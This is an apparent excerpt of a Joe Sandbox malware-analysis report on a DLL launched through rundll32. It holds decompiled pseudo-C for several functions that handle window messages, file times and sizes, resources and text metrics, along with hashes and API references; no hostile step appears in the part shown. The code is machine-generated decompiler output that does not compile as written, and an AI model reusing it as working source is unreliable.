                                                                                                            • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                                                            • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                                                            • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002084F Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002084F(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10006D96( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
								if((E1002049B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10006DAF( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10006DAF( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1002049B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                                                            0x10020852
                                                                                                            0x10020853
                                                                                                            0x10020856
                                                                                                            0x1002085d
                                                                                                            0x10020863
                                                                                                            0x10020868
                                                                                                            0x10020878
                                                                                                            0x10020891
                                                                                                            0x10020899
                                                                                                            0x100208a1
                                                                                                            0x100208a4
                                                                                                            0x100208ae
                                                                                                            0x100208ef
                                                                                                            0x100208c4
                                                                                                            0x100208c8
                                                                                                            0x100208d5
                                                                                                            0x00000000
                                                                                                            0x100208d7
                                                                                                            0x100208d7
                                                                                                            0x100208dd
                                                                                                            0x00000000
                                                                                                            0x1002094a
                                                                                                            0x1002094a
                                                                                                            0x1002094a
                                                                                                            0x00000000
                                                                                                            0x1002094a
                                                                                                            0x100208dd
                                                                                                            0x00000000
                                                                                                            0x100208d5
                                                                                                            0x100208fa
                                                                                                            0x10020904
                                                                                                            0x10020943
                                                                                                            0x1002091a
                                                                                                            0x1002091f
                                                                                                            0x10020922
                                                                                                            0x10020937
                                                                                                            0x10020937
                                                                                                            0x10020941
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10020924
                                                                                                            0x10020932
                                                                                                            0x00000000
                                                                                                            0x10020934
                                                                                                            0x10020934
                                                                                                            0x00000000
                                                                                                            0x10020934
                                                                                                            0x10020932
                                                                                                            0x00000000
                                                                                                            0x10020922
                                                                                                            0x1002087a
                                                                                                            0x10020883
                                                                                                            0x10020888
                                                                                                            0x1002088b
                                                                                                            0x1002094d
                                                                                                            0x10020956
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002088b
                                                                                                            0x10020958
                                                                                                            0x10020958
                                                                                                            0x10020868
                                                                                                            0x1002095c

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 10020883
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 100208E8
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1002092D
                                                                                                            • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 10020956
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction ID: 409e1e54ae5c96ed2e58890ddbbbae16c890d09ac2c6be6a3a2fbe05691f9f0c
                                                                                                            • Opcode Fuzzy Hash: 710cd69c4ce831577703fdc87a40672e046194d5e9149a170122c71cdf11eb61
                                                                                                            • Instruction Fuzzy Hash: 29315C30A00219EFDB15DF55D890EAE3BAAEF45390F50806AF54A9B213DA71ED80DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10026B4F Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10026B4F(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10011C50(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x100401d4; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010239(0,  &_v36, _t82,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010239(0,  &_v36, _t82,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010239(0,  &_v36, _t82,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}



















                                                                                                            0x10026b57
                                                                                                            0x10026b64
                                                                                                            0x10026b66
                                                                                                            0x10026b7a
                                                                                                            0x10026b80
                                                                                                            0x10026b83
                                                                                                            0x10026b89
                                                                                                            0x10026c56
                                                                                                            0x00000000
                                                                                                            0x10026c58
                                                                                                            0x10026b97
                                                                                                            0x10026ba4
                                                                                                            0x10026bbf
                                                                                                            0x00000000
                                                                                                            0x10026bbf
                                                                                                            0x10026baa
                                                                                                            0x10026bb3
                                                                                                            0x10026bb6
                                                                                                            0x10026bb9
                                                                                                            0x10026bc6
                                                                                                            0x10026bcc
                                                                                                            0x10026be4
                                                                                                            0x10026bce
                                                                                                            0x10026bce
                                                                                                            0x10026bce
                                                                                                            0x10026bf0
                                                                                                            0x10026bf7
                                                                                                            0x10026bfc
                                                                                                            0x10026c08
                                                                                                            0x10026c0f
                                                                                                            0x10026c15
                                                                                                            0x10026c21
                                                                                                            0x10026c28
                                                                                                            0x10026c2e
                                                                                                            0x10026c36
                                                                                                            0x10026c3a
                                                                                                            0x10026c3f
                                                                                                            0x10026c3f
                                                                                                            0x10026c48
                                                                                                            0x10026c4d
                                                                                                            0x10026c53
                                                                                                            0x10026c53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 10026B7A
                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 10026B9C
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 10026BAA
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 10026BD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1499663573-0
                                                                                                            • Opcode ID: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction ID: a18b0f555d231170b7735eacb595d982f5b9ad02e146dd108c4f4c0e1a6c5240
                                                                                                            • Opcode Fuzzy Hash: 264b54ed5d3c1a5871a5bc4a1410a4c0aead81c30cddf2f294e70723d2439856
                                                                                                            • Instruction Fuzzy Hash: 06419CB56006059FC724DFA4DD84CAABBF8FF093103508A2EE1A6D76A0E730F944CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C29A Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1000C29A(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t71;

				_t71 = _a4 + 0xffffff2c;
				if( *((intOrPtr*)(_t71 + 0x84)) != 0) {
					return 0;
				}
				_t58 = _a8;
				if( *((intOrPtr*)(_t71 + 0x8c)) != 0) {
					L4:
					if( *((intOrPtr*)(_t71 + 0x98)) == _t58) {
						__imp__#9(_t71 + 0xa8);
						_t41 =  *((intOrPtr*)(_t71 + 0x4c));
						_push( &_a4);
						_push(0x10043098);
						_a4 = 0;
						_push(_t41);
						if( *((intOrPtr*)( *_t41))() >= 0) {
							E10011C50( &_v56, 0, 0x20);
							E10011C50( &_v24, 0, 0x10);
							_t47 = _a4;
							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
							_t60 = __imp__#6;
							_a8 = _t48;
							if(_v52 != 0) {
								 *_t60(_v52);
							}
							if(_v48 != 0) {
								 *_t60(_v48);
							}
							if(_v44 != 0) {
								 *_t60(_v44);
							}
							_t49 = _a4;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							if(_a8 >= 0) {
								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
							}
						}
					}
					_t39 = 0;
					goto L15;
				} else {
					_v60 = 2;
					_v56 = _t58;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					E1000A823(_t71,  &_v60);
					_t39 = _v36;
					if(_t39 != 0) {
						L15:
						return _t39;
					}
					goto L4;
				}
			}





















                                                                                                            0x1000c2a5
                                                                                                            0x1000c2b3
                                                                                                            0x00000000
                                                                                                            0x1000c2b5
                                                                                                            0x1000c2c3
                                                                                                            0x1000c2c6
                                                                                                            0x1000c2fa
                                                                                                            0x1000c300
                                                                                                            0x1000c30d
                                                                                                            0x1000c313
                                                                                                            0x1000c319
                                                                                                            0x1000c31a
                                                                                                            0x1000c31f
                                                                                                            0x1000c324
                                                                                                            0x1000c329
                                                                                                            0x1000c332
                                                                                                            0x1000c33e
                                                                                                            0x1000c343
                                                                                                            0x1000c368
                                                                                                            0x1000c36e
                                                                                                            0x1000c374
                                                                                                            0x1000c377
                                                                                                            0x1000c37c
                                                                                                            0x1000c37c
                                                                                                            0x1000c381
                                                                                                            0x1000c386
                                                                                                            0x1000c386
                                                                                                            0x1000c38b
                                                                                                            0x1000c390
                                                                                                            0x1000c390
                                                                                                            0x1000c392
                                                                                                            0x1000c398
                                                                                                            0x1000c39e
                                                                                                            0x1000c3a0
                                                                                                            0x1000c3a0
                                                                                                            0x1000c39e
                                                                                                            0x1000c329
                                                                                                            0x1000c3aa
                                                                                                            0x00000000
                                                                                                            0x1000c2c8
                                                                                                            0x1000c2ce
                                                                                                            0x1000c2d5
                                                                                                            0x1000c2d8
                                                                                                            0x1000c2db
                                                                                                            0x1000c2de
                                                                                                            0x1000c2e1
                                                                                                            0x1000c2e4
                                                                                                            0x1000c2e7
                                                                                                            0x1000c2ea
                                                                                                            0x1000c2ef
                                                                                                            0x1000c2f4
                                                                                                            0x1000c3ac
                                                                                                            0x00000000
                                                                                                            0x1000c3ac
                                                                                                            0x00000000
                                                                                                            0x1000c2f4

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$ClearVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 3349467263-0
                                                                                                            • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                                                            • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036A6D Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t22;
				signed short _t23;
				void* _t24;
				signed int _t29;
				signed short _t31;
				void* _t37;
				signed short _t38;
				signed short* _t47;
				void* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t56 =  *(E100373B5() + 0xc);
				_t22 = FindResourceA(_t56, _a4, 0xf1);
				if(_t22 == 0) {
					L3:
					_t23 = 0;
				} else {
					_t24 = LoadResource(_t56, _t22);
					_v12 = _t24;
					if(_t24 == 0) {
						goto L3;
					} else {
						_t58 = LockResource(_t24);
						if(_t58 != 0) {
							_push(_t37);
							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
							_t29 = 0;
							__eflags =  *(_t58 + 6);
							if( *(_t58 + 6) > 0) {
								_t7 = _t58 + 8; // 0x8
								_t47 = _t7;
								do {
									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
									_t29 = _t29 + 1;
									_t47 =  &(_t47[1]);
									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
							}
							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
							_push(_t53);
							_t38 = _t31;
							L1001F7A9(_t38, _t53, _t58, __eflags);
							__eflags = _t38;
							if(_t38 != 0) {
								_t44 =  *(_t58 + 4) & 0x0000ffff;
								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
								_t38 = E1003697A(_v8, _a4);
							}
							FreeResource(_v12);
							_t23 = _t38;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}




















                                                                                                            0x10036a70
                                                                                                            0x10036a71
                                                                                                            0x10036a73
                                                                                                            0x10036a7b
                                                                                                            0x10036a87
                                                                                                            0x10036a8f
                                                                                                            0x10036aad
                                                                                                            0x10036aad
                                                                                                            0x10036a91
                                                                                                            0x10036a93
                                                                                                            0x10036a9b
                                                                                                            0x10036a9e
                                                                                                            0x00000000
                                                                                                            0x10036aa0
                                                                                                            0x10036aa7
                                                                                                            0x10036aab
                                                                                                            0x10036ab5
                                                                                                            0x10036ac0
                                                                                                            0x10036ac2
                                                                                                            0x10036ac4
                                                                                                            0x10036ac9
                                                                                                            0x10036acb
                                                                                                            0x10036acb
                                                                                                            0x10036ace
                                                                                                            0x10036ad1
                                                                                                            0x10036ad8
                                                                                                            0x10036ada
                                                                                                            0x10036adb
                                                                                                            0x10036adb
                                                                                                            0x10036ace
                                                                                                            0x10036ae8
                                                                                                            0x10036aed
                                                                                                            0x10036aee
                                                                                                            0x10036af0
                                                                                                            0x10036af5
                                                                                                            0x10036af8
                                                                                                            0x10036afa
                                                                                                            0x10036b0f
                                                                                                            0x10036b1f
                                                                                                            0x10036b1f
                                                                                                            0x10036b24
                                                                                                            0x10036b2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10036aab
                                                                                                            0x10036a9e
                                                                                                            0x10036b30

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                                                            • FreeResource.KERNEL32(?), ref: 10036B24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                                                            • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000BEEF Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1000BEEF(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E10011BF0(0x1003aec3, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E10029068();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
				E100293B4(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}









                                                                                                            0x1000bef4
                                                                                                            0x1000befe
                                                                                                            0x1000bf00
                                                                                                            0x1000bf03
                                                                                                            0x1000bf0d
                                                                                                            0x1000bf10
                                                                                                            0x1000bf15
                                                                                                            0x1000bf18
                                                                                                            0x1000bf33
                                                                                                            0x1000bf34
                                                                                                            0x1000bf3b
                                                                                                            0x1000bf3e
                                                                                                            0x00000000
                                                                                                            0x1000bf40
                                                                                                            0x1000bf43
                                                                                                            0x1000bf66
                                                                                                            0x1000bf45
                                                                                                            0x1000bf4f
                                                                                                            0x1000bf50
                                                                                                            0x1000bf51
                                                                                                            0x1000bf52
                                                                                                            0x1000bf53
                                                                                                            0x1000bf55
                                                                                                            0x1000bf7a
                                                                                                            0x1000bf88
                                                                                                            0x1000bf8d
                                                                                                            0x1000bf92
                                                                                                            0x1000bf98
                                                                                                            0x1000bf94
                                                                                                            0x1000bf94
                                                                                                            0x1000bf94
                                                                                                            0x1000bf9e
                                                                                                            0x1000bf9e
                                                                                                            0x1000bf1a
                                                                                                            0x1000bf1a
                                                                                                            0x1000bf1a
                                                                                                            0x1000bf1a
                                                                                                            0x1000bfa0
                                                                                                            0x1000bfa7
                                                                                                            0x1000bfae
                                                                                                            0x1000bfba
                                                                                                            0x1000bfc2

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateH_prologIndirectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2123978231-0
                                                                                                            • Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
                                                                                                            • Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002C73E Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebp;
				long _t25;
				int _t35;
				intOrPtr* _t40;
				void* _t43;
				intOrPtr _t53;
				intOrPtr* _t59;
				intOrPtr _t60;

				_t59 = __ecx;
				_push(0);
				E100290F7( &_v52);
				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_t43 = 0;
				if(_t25 != 0) {
					_t43 = E1000866D( &_v52, _t25);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t62 = _t43;
				if(_t43 != 0) {
					E1000866D( &_v52, _t43);
				}
				E10029152( &_v52, _t62);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
				_t35 = GetSystemMetrics(6);
				_t60 =  *((intOrPtr*)(_t59 + 0x90));
				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				if(_t53 < _t60) {
					_t53 = _t60;
				}
				_t40 = _a4;
				 *_t40 = 0x7fff;
				 *((intOrPtr*)(_t40 + 4)) = _t53;
				return _t40;
			}

















                                                                                                            0x1002c747
                                                                                                            0x1002c74b
                                                                                                            0x1002c74f
                                                                                                            0x1002c75b
                                                                                                            0x1002c761
                                                                                                            0x1002c765
                                                                                                            0x1002c770
                                                                                                            0x1002c770
                                                                                                            0x1002c779
                                                                                                            0x1002c77f
                                                                                                            0x1002c781
                                                                                                            0x1002c787
                                                                                                            0x1002c787
                                                                                                            0x1002c78f
                                                                                                            0x1002c798
                                                                                                            0x1002c7a9
                                                                                                            0x1002c7bd
                                                                                                            0x1002c7d0
                                                                                                            0x1002c7dc
                                                                                                            0x1002c7e9
                                                                                                            0x1002c7ef
                                                                                                            0x1002c7f1
                                                                                                            0x1002c7f1
                                                                                                            0x1002c7f3
                                                                                                            0x1002c7f8
                                                                                                            0x1002c7fa
                                                                                                            0x1002c7ff

                                                                                                            APIs
                                                                                                              • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                                                              • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 1002C75B
                                                                                                            • GetTextMetricsA.GDI32(?,?), ref: 1002C779
